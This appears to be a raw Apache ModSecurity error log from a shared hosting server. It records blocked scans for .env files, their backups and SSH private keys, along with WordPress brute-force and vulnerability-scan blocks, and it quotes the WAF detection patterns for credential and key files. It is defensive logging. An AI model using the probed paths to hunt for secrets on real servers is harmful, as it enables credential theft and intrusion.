[Tue May 26 15:18:28.759164 2026] [security2:error] [pid 700087:tid 700343] [client 5.255.121.183:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/app/.env"] [unique_id "ahVsbJPHQM4as9fEIIacWQAAAH4"]
[Tue May 26 15:18:28.768286 2026] [security2:error] [pid 700087:tid 700259] [client 5.255.121.183:43306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/api/.env"] [unique_id "ahVsbJPHQM4as9fEIIacXAAAACo"]
[Tue May 26 15:18:28.870845 2026] [security2:error] [pid 700087:tid 700247] [client 5.255.121.183:43404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVsbJPHQM4as9fEIIacYAAAAB4"]
[Tue May 26 15:18:28.870973 2026] [security2:error] [pid 700087:tid 700223] [client 5.255.121.183:43328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/public/.env"] [unique_id "ahVsbJPHQM4as9fEIIacYQAAAAY"]
[Tue May 26 15:18:28.871933 2026] [security2:error] [pid 700087:tid 700313] [client 5.255.121.183:43210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVsbJPHQM4as9fEIIacYgAAAGA"]
[Tue May 26 15:18:30.046673 2026] [security2:error] [pid 700087:tid 700111] [remote 82.196.25.136:42860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVsbZPHQM4as9fEIIacrgAADBc"]
[Tue May 26 15:18:30.608387 2026] [security2:error] [pid 700087:tid 700219] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsbpPHQM4as9fEIIacuwAAAAI"]
[Tue May 26 15:18:31.736877 2026] [proxy:error] [pid 700087:tid 700266] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:18:31.736922 2026] [proxy_http:error] [pid 700087:tid 700266] [client 198.235.24.131:64912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:18:31.737502 2026] [proxy:error] [pid 700087:tid 700266] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:18:31.737536 2026] [proxy_http:error] [pid 700087:tid 700266] [client 198.235.24.131:64912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:18:33.004877 2026] [security2:error] [pid 700087:tid 700313] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVscJPHQM4as9fEIIadBQAAAGA"]
[Tue May 26 15:18:33.902457 2026] [autoindex:error] [pid 700087:tid 700320] [client 5.255.121.183:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:18:34.652575 2026] [security2:error] [pid 700087:tid 700259] [client 114.119.141.83:63427] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "midrivermarina.com"] [uri "/product/section-i/"] [unique_id "ahVscpPHQM4as9fEIIadTAAAACo"], referer: https://midrivermarina.com/boat-slips/
[Tue May 26 15:18:34.958168 2026] [security2:error] [pid 700087:tid 700269] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVscpPHQM4as9fEIIadSwAAADQ"]
[Tue May 26 15:18:36.687699 2026] [security2:error] [pid 700087:tid 700284] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsdJPHQM4as9fEIIadiAAAAEM"]
[Tue May 26 15:18:39.309236 2026] [security2:error] [pid 700087:tid 700275] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsdpPHQM4as9fEIIad-QAAADo"]
[Tue May 26 15:18:40.282630 2026] [autoindex:error] [pid 700087:tid 700329] [client 162.14.66.219:56598] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:18:41.269022 2026] [security2:error] [pid 700087:tid 700279] [client 185.191.171.6:17980] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVseZPHQM4as9fEIIaeTwAAAD4"]
[Tue May 26 15:18:41.269183 2026] [security2:error] [pid 700087:tid 700279] [client 185.191.171.6:17980] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVseZPHQM4as9fEIIaeTwAAAD4"]
[Tue May 26 15:18:41.933422 2026] [security2:error] [pid 700087:tid 700232] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVseZPHQM4as9fEIIaeWgAAAA8"]
[Tue May 26 15:18:43.065377 2026] [security2:error] [pid 700087:tid 700248] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsepPHQM4as9fEIIaeeQAAAB8"]
[Tue May 26 15:18:46.061684 2026] [security2:error] [pid 700087:tid 700269] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsfZPHQM4as9fEIIae7AAAADQ"]
[Tue May 26 15:18:47.996481 2026] [security2:error] [pid 700087:tid 700304] [client 5.255.121.183:48678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/.env.bak"] [unique_id "ahVsf5PHQM4as9fEIIafVAAAAFc"]
[Tue May 26 15:18:47.998702 2026] [security2:error] [pid 700087:tid 700329] [client 5.255.121.183:48724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/backend/.env"] [unique_id "ahVsf5PHQM4as9fEIIafXQAAAHA"]
[Tue May 26 15:18:47.999994 2026] [security2:error] [pid 700087:tid 700233] [client 5.255.121.183:48746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVsf5PHQM4as9fEIIafWwAAABA"]
[Tue May 26 15:18:48.000134 2026] [security2:error] [pid 700087:tid 700296] [client 5.255.121.183:48690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/.env.old"] [unique_id "ahVsf5PHQM4as9fEIIafWgAAAE8"]
[Tue May 26 15:18:48.001888 2026] [security2:error] [pid 700087:tid 700342] [client 5.255.121.183:48624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/.env"] [unique_id "ahVsf5PHQM4as9fEIIafYAAAAH0"]
[Tue May 26 15:18:48.056385 2026] [security2:error] [pid 700087:tid 700217] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsf5PHQM4as9fEIIafOwAAAAA"]
[Tue May 26 15:18:48.387642 2026] [security2:error] [pid 700087:tid 700245] [client 5.255.121.183:48760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/.env.backup"] [unique_id "ahVsgJPHQM4as9fEIIaflgAAABw"]
[Tue May 26 15:18:48.520110 2026] [security2:error] [pid 700087:tid 700236] [client 5.255.121.183:48664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/app/.env"] [unique_id "ahVsgJPHQM4as9fEIIafngAAABM"]
[Tue May 26 15:18:48.520765 2026] [security2:error] [pid 700087:tid 700320] [client 5.255.121.183:48884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/public/.env"] [unique_id "ahVsgJPHQM4as9fEIIafoAAAAGc"]
[Tue May 26 15:18:48.521039 2026] [security2:error] [pid 700087:tid 700252] [client 5.255.121.183:48890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVsgJPHQM4as9fEIIafnwAAACM"]
[Tue May 26 15:18:48.522178 2026] [security2:error] [pid 700087:tid 700265] [client 5.255.121.183:48590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gldmarsa.com"] [uri "/api/.env"] [unique_id "ahVsgJPHQM4as9fEIIafogAAADA"]
[Tue May 26 15:18:50.340750 2026] [security2:error] [pid 700087:tid 700229] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsgZPHQM4as9fEIIagFAAAAAw"]
[Tue May 26 15:18:52.322196 2026] [security2:error] [pid 700087:tid 700258] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsg5PHQM4as9fEIIagbwAAACk"]
[Tue May 26 15:18:53.558371 2026] [security2:error] [pid 700087:tid 700113] [remote 111.229.10.83:39308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVshZPHQM4as9fEIIagtgAAbRk"]
[Tue May 26 15:18:53.762810 2026] [security2:error] [pid 700087:tid 700219] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVshZPHQM4as9fEIIagtQAAAAI"]
[Tue May 26 15:18:54.543345 2026] [security2:error] [pid 700087:tid 700223] [client 14.236.6.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVshpPHQM4as9fEIIag3gAAAAY"]
[Tue May 26 15:18:56.711573 2026] [security2:error] [pid 700087:tid 700294] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsiJPHQM4as9fEIIahHQAAAE0"]
[Tue May 26 15:18:56.724725 2026] [security2:error] [pid 700087:tid 700239] [client 14.163.99.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsiJPHQM4as9fEIIahLQAAABY"]
[Tue May 26 15:18:56.985505 2026] [security2:error] [pid 700087:tid 700219] [client 103.5.134.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsiJPHQM4as9fEIIahQAAAAAI"], referer: https://app.zintlr.com/
[Tue May 26 15:18:58.117545 2026] [security2:error] [pid 700087:tid 700292] [client 113.191.14.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsiZPHQM4as9fEIIahWwAAAEs"]
[Tue May 26 15:18:59.213064 2026] [security2:error] [pid 700087:tid 700276] [client 66.249.66.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVsi5PHQM4as9fEIIahlAAAADs"]
[Tue May 26 15:18:59.484274 2026] [security2:error] [pid 700087:tid 700340] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsi5PHQM4as9fEIIahkQAAAHs"]
[Tue May 26 15:19:01.471997 2026] [security2:error] [pid 700087:tid 700291] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsjZPHQM4as9fEIIah6wAAAEo"]
[Tue May 26 15:19:02.425327 2026] [security2:error] [pid 700087:tid 700222] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsjpPHQM4as9fEIIaiDgAAAAU"]
[Tue May 26 15:19:04.707771 2026] [security2:error] [pid 700087:tid 700253] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVskJPHQM4as9fEIIaiTgAAACQ"]
[Tue May 26 15:19:07.356240 2026] [security2:error] [pid 700087:tid 700240] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVskpPHQM4as9fEIIaioAAAABc"]
[Tue May 26 15:19:08.672458 2026] [security2:error] [pid 700087:tid 700187] [remote 74.7.241.58:48074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVslJPHQM4as9fEIIai5AAAZGM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes
[Tue May 26 15:19:09.474578 2026] [security2:error] [pid 700087:tid 700307] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVslZPHQM4as9fEIIai9gAAAFo"]
[Tue May 26 15:19:11.071027 2026] [security2:error] [pid 700087:tid 700280] [client 89.124.83.75:53659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.83.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahVslpPHQM4as9fEIIajMQAAAD8"], referer: http://toronto121mortgage.com/index.php?error=invalid_form
[Tue May 26 15:19:11.646538 2026] [security2:error] [pid 700087:tid 700318] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsl5PHQM4as9fEIIajOwAAAGU"]
[Tue May 26 15:19:13.242434 2026] [security2:error] [pid 700087:tid 700247] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsmJPHQM4as9fEIIajbwAAAB4"]
[Tue May 26 15:19:14.537292 2026] [security2:error] [pid 700087:tid 700343] [client 136.185.6.192:50393] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.rathnaa.co.in"] [uri "/dcr/admin/add_show.php"] [unique_id "ahVsmpPHQM4as9fEIIajoAAAAH4"]
[Tue May 26 15:19:14.560036 2026] [security2:error] [pid 700087:tid 700227] [client 74.7.244.10:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.algosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVsmpPHQM4as9fEIIajnwAAAAo"]
[Tue May 26 15:19:14.560068 2026] [security2:error] [pid 700087:tid 700227] [client 74.7.244.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.algosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVsmpPHQM4as9fEIIajnwAAAAo"]
[Tue May 26 15:19:14.562685 2026] [security2:error] [pid 700087:tid 700232] [client 74.7.244.10:34866] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.algosoftware.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahVsmpPHQM4as9fEIIajnAAAD2g"]
[Tue May 26 15:19:14.657523 2026] [security2:error] [pid 700087:tid 700277] [client 185.191.171.16:10532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/parallax/"] [unique_id "ahVsmpPHQM4as9fEIIajrQAAADw"]
[Tue May 26 15:19:14.657635 2026] [security2:error] [pid 700087:tid 700277] [client 185.191.171.16:10532] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/features/parallax/"] [unique_id "ahVsmpPHQM4as9fEIIajrQAAADw"]
